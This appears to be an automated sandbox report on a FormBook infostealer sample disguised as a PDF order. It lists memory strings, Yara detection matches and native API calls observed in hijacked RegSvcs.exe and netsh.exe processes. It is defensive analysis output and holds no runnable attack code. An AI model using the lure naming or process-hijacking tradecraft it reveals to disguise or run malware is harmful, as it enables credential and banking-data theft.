          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s_tr
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.234872250.0000000005C46000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vv
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: nova narud#U017eba pdf rvP6N.exeString found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
          Source: nova narud#U017eba pdf rvP6N.exeString found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
          Source: nova narud#U017eba pdf rvP6N.exeString found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.247192769.0000000002C60000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A070 NtClose,3_2_0041A070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A120 NtAllocateVirtualMemory,3_2_0041A120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00419F40 NtCreateFile,3_2_00419F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00419FF0 NtReadFile,3_2_00419FF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A09A NtReadFile,3_2_0041A09A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A11A NtAllocateVirtualMemory,3_2_0041A11A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00419F3A NtCreateFile,3_2_00419F3A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00419FEB NtReadFile,3_2_00419FEB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01209910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012099A0 NtCreateSection,LdrInitializeThunk,3_2_012099A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01209860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209840 NtDelayExecution,LdrInitializeThunk,3_2_01209840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012098F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_012098F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209A20 NtResumeThread,LdrInitializeThunk,3_2_01209A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01209A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209A50 NtCreateFile,LdrInitializeThunk,3_2_01209A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209540 NtReadFile,LdrInitializeThunk,3_2_01209540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012095D0 NtClose,LdrInitializeThunk,3_2_012095D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209710 NtQueryInformationToken,LdrInitializeThunk,3_2_01209710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012097A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_012097A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209780 NtMapViewOfSection,LdrInitializeThunk,3_2_01209780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01209660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012096E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_012096E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209950 NtQueueApcThread,3_2_01209950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012099D0 NtCreateProcessEx,3_2_012099D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209820 NtEnumerateKey,3_2_01209820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120B040 NtSuspendThread,3_2_0120B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012098A0 NtWriteVirtualMemory,3_2_012098A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209B00 NtSetValueKey,3_2_01209B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120A3B0 NtGetContextThread,3_2_0120A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209A10 NtQuerySection,3_2_01209A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209A80 NtOpenDirectoryObject,3_2_01209A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209520 NtWaitForSingleObject,3_2_01209520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120AD30 NtSetContextThread,3_2_0120AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209560 NtWriteFile,3_2_01209560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012095F0 NtQueryInformationFile,3_2_012095F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209730 NtQueryVirtualMemory,3_2_01209730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120A710 NtOpenProcessToken,3_2_0120A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209760 NtOpenProcess,3_2_01209760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209770 NtSetInformationFile,3_2_01209770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120A770 NtOpenThread,3_2_0120A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209FE0 NtCreateMutant,3_2_01209FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209610 NtEnumerateValueKey,3_2_01209610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209670 NtQueryInformationProcess,3_2_01209670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01209650 NtQueryValueKey,3_2_01209650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012096D0 NtCreateKey,3_2_012096D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9710 NtQueryInformationToken,LdrInitializeThunk,15_2_035F9710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9FE0 NtCreateMutant,LdrInitializeThunk,15_2_035F9FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9780 NtMapViewOfSection,LdrInitializeThunk,15_2_035F9780
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9A50 NtCreateFile,LdrInitializeThunk,15_2_035F9A50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F96D0 NtCreateKey,LdrInitializeThunk,15_2_035F96D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_035F96E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9540 NtReadFile,LdrInitializeThunk,15_2_035F9540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_035F9910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F95D0 NtClose,LdrInitializeThunk,15_2_035F95D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F99A0 NtCreateSection,LdrInitializeThunk,15_2_035F99A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9840 NtDelayExecution,LdrInitializeThunk,15_2_035F9840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_035F9860
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9770 NtSetInformationFile,15_2_035F9770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035FA770 NtOpenThread,15_2_035FA770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9760 NtOpenProcess,15_2_035F9760
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035FA710 NtOpenProcessToken,15_2_035FA710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9B00 NtSetValueKey,15_2_035F9B00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9730 NtQueryVirtualMemory,15_2_035F9730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035FA3B0 NtGetContextThread,15_2_035FA3B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F97A0 NtUnmapViewOfSection,15_2_035F97A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9650 NtQueryValueKey,15_2_035F9650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9670 NtQueryInformationProcess,15_2_035F9670
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9660 NtAllocateVirtualMemory,15_2_035F9660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9610 NtEnumerateValueKey,15_2_035F9610
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9A10 NtQuerySection,15_2_035F9A10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9A00 NtProtectVirtualMemory,15_2_035F9A00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9A20 NtResumeThread,15_2_035F9A20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9A80 NtOpenDirectoryObject,15_2_035F9A80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9950 NtQueueApcThread,15_2_035F9950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9560 NtWriteFile,15_2_035F9560
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035FAD30 NtSetContextThread,15_2_035FAD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9520 NtWaitForSingleObject,15_2_035F9520
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F99D0 NtCreateProcessEx,15_2_035F99D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F95F0 NtQueryInformationFile,15_2_035F95F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035FB040 NtSuspendThread,15_2_035FB040
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F9820 NtEnumerateKey,15_2_035F9820
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F98F0 NtReadVirtualMemory,15_2_035F98F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035F98A0 NtWriteVirtualMemory,15_2_035F98A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B2A070 NtClose,15_2_00B2A070
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B29FF0 NtReadFile,15_2_00B29FF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B29F40 NtCreateFile,15_2_00B29F40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B2A09A NtReadFile,15_2_00B2A09A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B29FEB NtReadFile,15_2_00B29FEB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B29F3A NtCreateFile,15_2_00B29F3A
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_007A20500_2_007A2050
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_0110DCF40_2_0110DCF4
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_0110C1480_2_0110C148
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_0110E2180_2_0110E218
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_0110A7480_2_0110A748
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A553F00_2_02A553F0
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A557280_2_02A55728
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A564580_2_02A56458
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A575100_2_02A57510
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A509400_2_02A50940
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A58CB90_2_02A58CB9
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A572F30_2_02A572F3
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A553E10_2_02A553E1
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A573000_2_02A57300
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A557210_2_02A55721
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A5348B0_2_02A5348B
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A534980_2_02A53498
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A574F10_2_02A574F1
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A564560_2_02A56456
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A515480_2_02A51548
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A515580_2_02A51558
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A51A280_2_02A51A28
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A51A170_2_02A51A17
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A5ABA80_2_02A5ABA8
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A508E00_2_02A508E0
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A56EE00_2_02A56EE0
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A56ED00_2_02A56ED0
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A50FF00_2_02A50FF0
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A51CA00_2_02A51CA0
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_02A51CB00_2_02A51CB0
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 0_2_051343DC0_2_051343DC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041E1F93_2_0041E1F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041D1833_2_0041D183
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041D1863_2_0041D186
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041E45A3_2_0041E45A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041DDD13_2_0041DDD1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00409E403_2_00409E40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00409E3C3_2_00409E3C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011CF9003_2_011CF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011E41203_2_011E4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0129E8243_2_0129E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012810023_2_01281002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012920A83_2_012920A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011DB0903_2_011DB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F20A03_2_011F20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012928EC3_2_012928EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01292B283_2_01292B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011FEBB03_2_011FEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012803DA3_2_012803DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0128DBD23_2_0128DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012922AE3_2_012922AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01292D073_2_01292D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011C0D203_2_011C0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01291D553_2_01291D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F25813_2_011F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012925DD3_2_012925DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011DD5E03_2_011DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011D841F3_2_011D841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0128D4663_2_0128D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01291FF13_2_01291FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0129DFCE3_2_0129DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011E6E303_2_011E6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0128D6163_2_0128D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01292EF73_2_01292EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_03682B2815_2_03682B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_03681FF115_2_03681FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_0367DBD215_2_0367DBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035EEBB015_2_035EEBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035D6E3015_2_035D6E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_03682EF715_2_03682EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_036822AE15_2_036822AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_03681D5515_2_03681D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035BF90015_2_035BF900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_03682D0715_2_03682D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035B0D2015_2_035B0D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035D412015_2_035D4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035CD5E015_2_035CD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035E258115_2_035E2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035C841F15_2_035C841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_0367100215_2_03671002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_036820A815_2_036820A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035CB09015_2_035CB090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_035E20A015_2_035E20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B2D18315_2_00B2D183
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B2D18615_2_00B2D186
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B2E1F915_2_00B2E1F9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B2E45A15_2_00B2E45A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B12D9015_2_00B12D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B2DDD115_2_00B2DDD1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B19E3C15_2_00B19E3C
